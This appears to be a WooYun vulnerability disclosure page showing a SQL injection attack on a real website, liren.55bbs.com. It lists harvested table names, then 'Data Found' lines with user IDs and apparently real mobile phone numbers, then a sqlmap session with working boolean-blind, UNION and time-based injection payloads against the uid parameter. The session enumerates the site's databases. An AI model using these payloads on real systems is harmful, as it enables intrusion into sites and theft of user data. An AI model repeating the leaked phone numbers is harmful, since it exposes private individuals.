WooYun.org

activity_1072
 activity_1073
 activity_1074
 activity_1075
 activity_1076
 activity_1077
 activity_1078
 activity_1079
 activity_1080
 activity_1081
 activity_1082
 activity_1083
 activity_1084
 activity_1085
 activity_1086
 activity_1087
 activity_1088
 activity_1089
 activity_1090
 activity_1091
 activity_1092
 activity_1093
 activity_1094
 activity_1095
 activity_1096
 activity_1097
 activity_1098
 activity_1099
 activity_1100
 activity_1101
 activity_1102
 activity_1103
 activity_1104
 activity_1105
 activity_1106
 activity_1107
 activity_1108
 activity_1109
 activity_1110
 activity_1111
 activity_1112
 activity_1113
 activity_1114
 activity_1115
 activity_1116
 activity_1117
 activity_1118
 activity_1119
 activity_1120
 activity_1121
 activity_1122
 activity_1123
 activity_1124
 activity_1125
 activity_1126
 activity_1127
 activity_1128
 activity_1129
 activity_1130
 activity_1131
 activity_1132
 activity_1133
 activity_1134
 activity_1135
 activity_1136
 activity_1137
 activity_1138
 activity_1139
 activity_1140
 activity_1141
 activity_1142
 activity_1143
 activity_1144
 activity_1145
 activity_1146
 activity_1147
 activity_1148
 activity_1149
 activity_1150
 activity_1151
 activity_1152
 activity_1153
 activity_1154
 activity_1155
 activity_1156
 activity_1157
 activity_1158
 activity_1159
 activity_1160
 activity_1161
 activity_1162
 activity_1163
 activity_1164
 activity_1165
 activity_1166
 activity_1167
 activity_1168
 activity_1169
 activity_1170
 activity_1171
 activity_1172
 activity_1173
 activity_1174
 activity_1175
 activity_1176
 activity_1177
 activity_1178
 activity_1179
 activity_1180
 activity_1181
 activity_1182
 activity_1183
 activity_1184
 activity_1185
 activity_1186
 activity_1187
 activity_1188
 activity_1189
 activity_1190
 activity_1191
 activity_1192
 activity_1193
 activity_1194
 activity_1195
 activity_1196
 activity_1197
 activity_1198
 activity_1199
 activity_1200
 activity_1201
 activity_1202
 activity_1203
 activity_1204
 activity_1205
 activity_1206
 activity_1207
 activity_1208
 activity_1209
 activity_1210
 activity_1211
 activity_1212
 activity_1213
 activity_1214
 activity_1215
 activity_1216
 activity_1217
 activity_1218
 activity_1219
 activity_122
 activity_1220
 activity_1221
 activity_1222
 activity_1223
 activity_1224
 activity_1225
 activity_1226
 activity_1227
 activity_1228
 activity_1229
 activity_1230
 activity_1231
 activity_1232
 activity_1233
 activity_1234
 activity_1235
 activity_1236
 activity_1237
 activity_1238
 activity_1239
 activity_1240
 activity_1241
 activity_1242
 activity_1243
 activity_1244
 activity_1245
 activity_1246
 activity_1247
 activity_1248
 activity_1249
 activity_1250
 activity_1251
 activity_1252
 activity_1253
 activity_1254
 activity_1255
 activity_1256
 activity_1257
 activity_1258
 activity_1259
 activity_1260
 activity_1261
 activity_1262
 activity_1263
 activity_1264
 activity_1265
 activity_1266
 activity_1267
 activity_1268
 activity_1269
 activity_1270
 activity_1271
 activity_1272
 activity_1273
 activity_1274
 activity_1275
 activity_1276
 activity_1277
 activity_1278
 activity_1279
 activity_1280
 activity_1281

Data Found: userinfo_id=62889
Data Found: Address=
Data Found: mobile=13811816153
Data Found: userinfo_id=106550
Data Found: Address=
Data Found: mobile=13910892801
Data Found: userinfo_id=150607

F:\Python26\sqlmap>sqlmap.py -u "http://liren.55bbs.com/files/panteneclinicare/s
how.php?uid=490614" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 19:54:11
[19:54:11] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output
 directory
[19:54:12] [INFO] resuming back-end DBMS 'mysql'
[19:54:12] [INFO] testing connection to the target URL
[19:54:12] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=490614' AND 4288=4288 AND 'YuWU'='YuWU
    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: uid=-8983' UNION ALL SELECT NULL,CONCAT(0x71796f7471,0x4d6e4d4b7a57
666f4566,0x7170637571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=490614' AND SLEEP(5) AND 'Elkx'='Elkx
---
[19:54:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.3.27
back-end DBMS: MySQL 5.0.11
[19:54:12] [INFO] fetching database names
[19:54:12] [INFO] the SQL query used returns 3 entries
[19:54:12] [INFO] resumed: "information_schema","information_schema"
[19:54:12] [INFO] resumed: "55user","55user"
[19:54:12] [INFO] resumed: "test","test"
available databases [3]:
[*] 55user
[*] information_schema
[*] test
[19:54:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\liren.55bbs.com'
[*] shutting down at 19:54:12